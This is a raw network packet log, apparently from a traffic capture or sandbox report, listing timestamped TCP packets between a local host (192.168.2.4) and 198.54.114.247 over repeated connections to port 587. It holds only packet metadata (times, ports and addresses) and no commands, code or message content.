Oct 1, 2024 06:17:40.209252119 CEST	50437	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:40.214133978 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:40.369359970 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:40.376974106 CEST	50437	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:40.383167028 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:40.563477039 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:40.563497066 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:40.563513994 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:40.563524008 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:40.563703060 CEST	50437	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:40.650718927 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:40.652514935 CEST	50437	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:40.657296896 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:40.812278032 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:40.813297033 CEST	50437	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:40.819171906 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:40.973568916 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:40.973846912 CEST	50437	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:40.978674889 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:41.133637905 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:41.133851051 CEST	50437	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:41.138715982 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:41.302735090 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:41.302968979 CEST	50437	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:41.309824944 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:41.464395046 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:41.464591980 CEST	50437	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:41.469438076 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:41.665812016 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:41.665976048 CEST	50437	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:41.670775890 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:41.830979109 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:41.831424952 CEST	50437	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:41.831476927 CEST	50437	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:41.831512928 CEST	50437	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:41.831541061 CEST	50437	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:41.836309910 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:41.836319923 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:41.836469889 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:42.065676928 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:42.066255093 CEST	50437	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:42.071120024 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:42.232940912 CEST	587	50437	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:42.233387947 CEST	50437	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:42.234338999 CEST	50438	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:42.239159107 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:42.239409924 CEST	50438	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:42.815769911 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:42.816047907 CEST	50438	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:42.820888996 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:42.980046988 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:42.994678020 CEST	50438	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:43.000305891 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:43.164812088 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:43.165222883 CEST	50438	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:43.170043945 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:43.352323055 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:43.352340937 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:43.352364063 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:43.352381945 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:43.352402925 CEST	50438	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:43.352431059 CEST	50438	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:43.444444895 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:43.445672989 CEST	50438	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:43.450525045 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:43.610893011 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:43.611798048 CEST	50438	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:43.616556883 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:43.775722027 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:43.775923014 CEST	50438	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:43.780769110 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:43.941298962 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:43.942264080 CEST	50438	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:43.947043896 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:44.133204937 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:44.137727022 CEST	50438	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:44.142515898 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:44.304775000 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:44.305516958 CEST	50438	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:44.311479092 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:44.487788916 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:44.487982035 CEST	50438	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:44.494647026 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:44.653990030 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:44.654273987 CEST	50438	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:44.654274940 CEST	50438	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:44.654366970 CEST	50438	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:44.654366970 CEST	50438	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:44.659120083 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:44.659126997 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:44.659205914 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:44.892056942 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:44.894036055 CEST	50438	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:44.898832083 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:45.061434984 CEST	587	50438	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:45.061904907 CEST	50438	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:45.062998056 CEST	50439	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:45.067909002 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:45.068001032 CEST	50439	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:45.638262033 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:45.638566017 CEST	50439	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:45.643381119 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:45.802429914 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:45.802573919 CEST	50439	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:45.807347059 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:45.968483925 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:45.973014116 CEST	50439	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:45.977890015 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:46.167960882 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:46.167973995 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:46.167980909 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:46.167992115 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:46.168116093 CEST	50439	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:46.168116093 CEST	50439	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:46.258305073 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:46.262891054 CEST	50439	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:46.267714977 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:46.428545952 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:46.429606915 CEST	50439	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:46.434576035 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:46.594971895 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:46.595312119 CEST	50439	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:46.600102901 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:46.763161898 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:46.763521910 CEST	50439	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:46.768341064 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:46.940936089 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:46.941239119 CEST	50439	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:46.946110010 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:47.104744911 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:47.104954958 CEST	50439	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:47.109813929 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:47.284522057 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:47.284719944 CEST	50439	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:47.289566040 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:47.448734999 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:47.450342894 CEST	50439	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:47.450392962 CEST	50439	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:47.450424910 CEST	50439	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:47.450424910 CEST	50439	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:47.455219030 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:47.455229044 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:47.455329895 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:47.455339909 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:47.663448095 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:47.663981915 CEST	50439	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:47.668843985 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:47.836081028 CEST	587	50439	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:47.837327003 CEST	50439	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:47.838363886 CEST	50440	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:47.843163013 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:47.843233109 CEST	50440	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:48.419986963 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:48.421667099 CEST	50440	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:48.426467896 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:48.587151051 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:48.589663029 CEST	50440	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:48.594480038 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:48.763170004 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:48.763660908 CEST	50440	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:48.768651962 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:48.967273951 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:48.967293978 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:48.967307091 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:48.967324018 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:48.967376947 CEST	50440	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:49.059726000 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:49.061626911 CEST	50440	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:49.066525936 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:49.226321936 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:49.227323055 CEST	50440	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:49.232213020 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:49.391594887 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:49.391956091 CEST	50440	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:49.396718025 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:49.564595938 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:49.568227053 CEST	50440	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:49.573050976 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:49.747222900 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:49.747399092 CEST	50440	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:49.752185106 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:49.911328077 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:49.911520004 CEST	50440	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:49.916330099 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:50.105958939 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:50.106252909 CEST	50440	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:50.111100912 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:50.275574923 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:50.275841951 CEST	50440	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:50.275841951 CEST	50440	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:50.275930882 CEST	50440	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:50.275996923 CEST	50440	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:50.280740023 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:50.280746937 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:50.280878067 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:50.280889034 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:50.511723995 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:50.512382030 CEST	50440	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:50.517241955 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:50.677762985 CEST	587	50440	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:50.678113937 CEST	50440	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:50.679090977 CEST	50441	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:50.683939934 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:50.684016943 CEST	50441	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:51.244262934 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:51.247301102 CEST	50441	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:51.252114058 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:51.409554005 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:51.409674883 CEST	50441	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:51.414515972 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:51.573014975 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:51.573394060 CEST	50441	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:51.578228951 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:51.768207073 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:51.768227100 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:51.768241882 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:51.768255949 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:51.768302917 CEST	50441	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:51.768340111 CEST	50441	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:51.856878042 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:51.858494997 CEST	50441	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:51.863306999 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:52.020123959 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:52.025988102 CEST	50441	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:52.030853033 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:52.187706947 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:52.191545963 CEST	50441	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:52.196392059 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:52.354835033 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:52.359574080 CEST	50441	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:52.364381075 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:52.548867941 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:52.549089909 CEST	50441	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:52.553873062 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:52.712482929 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:52.712836981 CEST	50441	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:52.717713118 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:52.888679981 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:52.891966105 CEST	50441	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:52.896841049 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:53.056539059 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:53.056879997 CEST	50441	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:53.056934118 CEST	50441	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:53.056955099 CEST	50441	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:53.056977987 CEST	50441	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:53.061703920 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:53.061709881 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:53.061937094 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:53.295847893 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:53.296468973 CEST	50441	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:53.301326036 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:53.462126017 CEST	587	50441	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:53.462672949 CEST	50441	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:53.463514090 CEST	50442	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:53.468408108 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:53.468493938 CEST	50442	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:54.097789049 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:54.105546951 CEST	50442	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:54.112533092 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:54.265378952 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:54.265640974 CEST	50442	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:54.270453930 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:54.427282095 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:54.427787066 CEST	50442	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:54.432638884 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:54.706828117 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:54.706839085 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:54.706932068 CEST	50442	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:54.775984049 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:54.775994062 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:54.776009083 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:54.776068926 CEST	50442	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:54.784615040 CEST	50442	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:54.790028095 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:54.945946932 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:54.955678940 CEST	50442	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:54.960591078 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:55.117686033 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:55.117929935 CEST	50442	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:55.122781992 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:55.277172089 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:55.277434111 CEST	50442	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:55.282253027 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:55.446506977 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:55.446692944 CEST	50442	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:55.451560974 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:55.606055021 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:55.606206894 CEST	50442	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:55.610960960 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:55.777841091 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:55.778115988 CEST	50442	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:55.782978058 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:55.938575029 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:55.938935041 CEST	50442	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:55.938971043 CEST	50442	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:55.938988924 CEST	50442	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:55.939013958 CEST	50442	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:55.943856955 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:55.943857908 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:55.943919897 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:56.190910101 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:56.191617966 CEST	50442	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:56.196463108 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:56.353452921 CEST	587	50442	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:56.353961945 CEST	50442	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:56.354903936 CEST	50443	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:56.359764099 CEST	587	50443	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:56.359936953 CEST	50443	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:56.925801992 CEST	587	50443	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:56.929655075 CEST	50443	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:56.934514999 CEST	587	50443	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:57.128225088 CEST	587	50443	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:57.128382921 CEST	50443	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:57.133407116 CEST	587	50443	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:57.618508101 CEST	587	50443	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:57.618872881 CEST	50443	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:57.623853922 CEST	587	50443	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:57.816548109 CEST	587	50443	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:57.816580057 CEST	587	50443	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:57.816592932 CEST	587	50443	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:57.816608906 CEST	587	50443	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:57.816623926 CEST	587	50443	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:57.816644907 CEST	50443	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:57.816706896 CEST	50443	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:57.863627911 CEST	50443	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:57.867877960 CEST	50443	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:57.869306087 CEST	50444	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:57.873317003 CEST	587	50443	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:57.873364925 CEST	50443	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:57.874119043 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:57.874177933 CEST	50444	587	192.168.2.4	198.54.114.247
Oct 1, 2024 06:17:58.445426941 CEST	587	50444	198.54.114.247	192.168.2.4
Oct 1, 2024 06:17:58.445621014 CEST	50444	587	192.168.2.4	198.54.114.247
